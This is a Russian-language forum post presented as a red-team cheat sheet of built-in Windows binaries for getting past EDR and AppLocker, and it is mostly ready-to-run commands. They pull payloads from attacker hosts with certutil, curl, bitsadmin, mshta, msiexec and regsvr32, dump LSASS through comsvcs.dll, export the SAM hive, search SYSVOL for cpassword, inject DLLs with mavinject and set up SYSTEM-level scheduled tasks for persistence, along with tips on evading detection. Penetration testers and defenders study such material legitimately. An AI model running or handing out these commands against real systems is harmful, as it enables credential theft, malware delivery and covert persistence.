![]() |
https://forum.antichat.xyz/attachmen...2/89707676.png
Справочник для red team операторов и пентестеров, у которых EDR (CrowdStrike Falcon, Defender for Endpoint) прибил весь привычный инструментарий, а доступ к cmd/PowerShell от непривилегированного пользователя - есть. Windows 10/Server 2016+, AppLocker с дефолтными правилами. Знакомая ситуация? Суть простая: зачем тащить на хост что-то своё, если в самой винде лежит полный набор для загрузки, выполнения и закрепления? Microsoft сама положила всё нужное - мы просто пользуемся - полную карту техник с разбором обхода EDR и пост-эксплуатации собрал в руководстве по living off the land атакам Windows. Где не сработает: системы с WDAC в enforce-режиме с кастомными политиками - часть техник не пройдёт. На Server Core без GUI Код:
mshtaКод:
hh.exeВсе команды - из официального проекта LOLBAS. ATT&CK-маппинг указан для каждой техники. Основные команды КомандаФлаги / параметрыНазначение / ATT&CK Код:
certutil.exeКод:
-urlcache -split -f http://IP/file.exe C:\Temp\file.exeКод:
certutil.exeКод:
-encode file.exe file.b64Код:
-decode file.b64 file.exeКод:
bitsadmin.exeКод:
/create job1 && bitsadmin /addfile job1 http://IP/f.exe C:\Temp\f.exe && bitsadmin /resume job1 && bitsadmin /complete job1Код:
mshta.exeКод:
http://IP/payload.htaКод:
regsvr32.exeКод:
/s /n /u /i:http://IP/file.sct scrobj.dllКод:
rundll32.exeКод:
C:\windows\system32\comsvcs.dll, MiniDump C:\Temp\lsass.dmp fullКод:
msiexec.exeКод:
/q /i http://IP/payload.msiКод:
wmic.exeКод:
process call create "cmd /c whoami > C:\Temp\out.txt"Код:
schtasks.exeКод:
/create /tn "Update" /tr "cmd /c payload.exe" /sc onlogon /ru SYSTEMКод:
msbuild.exeКод:
C:\Temp\payload.csprojКод:
InstallUtil.exeКод:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Temp\payload.dllКод:
[RunInstaller(true)]Код:
InstallerКод:
forfiles.exeКод:
/p C:\Windows\System32 /m notepad.exe /c "cmd /c payload.exe"Код:
mavinject.exeКод:
/INJECTRUNNING payload.dllКод:
reg.exeКод:
save HKLM\SAM C:\Temp\sam.bakКод:
findstr.exeКод:
/S /I cpassword \\DC\SYSVOL\*.xmlКод:
curl.exeКод:
-o C:\Temp\file.exe http://IP/file.exeЧастые сценарии Загрузка пейлоада в обход детекта certutil Код:
certutil -urlcacheКод:
curl.exeКод: Код:
curl.exe -s -o C:\Windows\Temp\update.exe http://192.168.1.100/beacon.exeКод:
curl.exeДамп LSASS без Mimikatz (T1003.001) Mimikatz заблокирован, а SeDebugPrivilege есть - классика. Используем comsvcs.dll через rundll32. Нужен elevated-контекст (High Integrity Level, не просто членство в Administrators - это частая ошибка). Важный момент: MDE детектирует сигнатуру Код:
rundll32 + comsvcs.dll + MiniDumpКод:
Behavior:Win32/LsassDump.AКод: Код:
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump 672 C:\Windows\Temp\lsass.dmp fullКод:
tasklist /fi "imagename eq lsass.exe"Persistence через schtasks без PowerShell (T1053.005) PowerShell заблокирован или логируется до последней запятой - чистая cmd-persistence. Код: Код:
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\beacon.exe" /sc onlogon /ru SYSTEM /fКод:
/fSquiblydoo: обход AppLocker через regsvr32 (T1218.010) AppLocker default rules покрывают EXE/DLL/Script/MSI, но COM-скриптлеты через scrobj.dll - мимо контроля. В этом и фокус Squiblydoo. https://forum.antichat.xyz/attachmen...6713351774.png Код: Код:
regsvr32.exe /s /n /u /i:http://192.168.1.100/payload.sct scrobj.dllНо есть нюанс (и он существенный): в WDAC с включённым Script Enforcement этот bypass не пройдёт. И большинство современных EDR уже хорошо знают эту технику - Код:
regsvr32Gotchas & подводные камни Тут собраны грабли, на которые наступают регулярно. Некоторые - очевидные, но именно очевидные вещи забываются в 3 часа ночи на проекте.
ЗадачаКомандаЗагрузка файла Код:
curl.exe -o C:\Temp\f.exe http://IP/f.exeКод:
certutil -urlcache -split -f http://IP/f.exe C:\Temp\f.exeКод:
rundll32 comsvcs.dll, MiniDump lsass.dmp fullКод:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Temp\payload.dllКод:
schtasks /create /tn "X" /tr "payload.exe" /sc onlogon /ru SYSTEM /fКод:
regsvr32 /s /n /u /i:http://IP/f.sct scrobj.dllКод:
findstr /S /I cpassword \\DC\SYSVOL\*.xmlКод:
mavinject /INJECTRUNNING payload.dllПри работе с Код:
rundll32.exe comsvcs.dll, MiniDumpКод:
svchost.exeМеня интересует конкретика: на каком EDR (CrowdStrike, MDE, SentinelOne) и при каком уровне политики ( Код:
detect-onlyКод:
prevent |
| Время: 08:52 |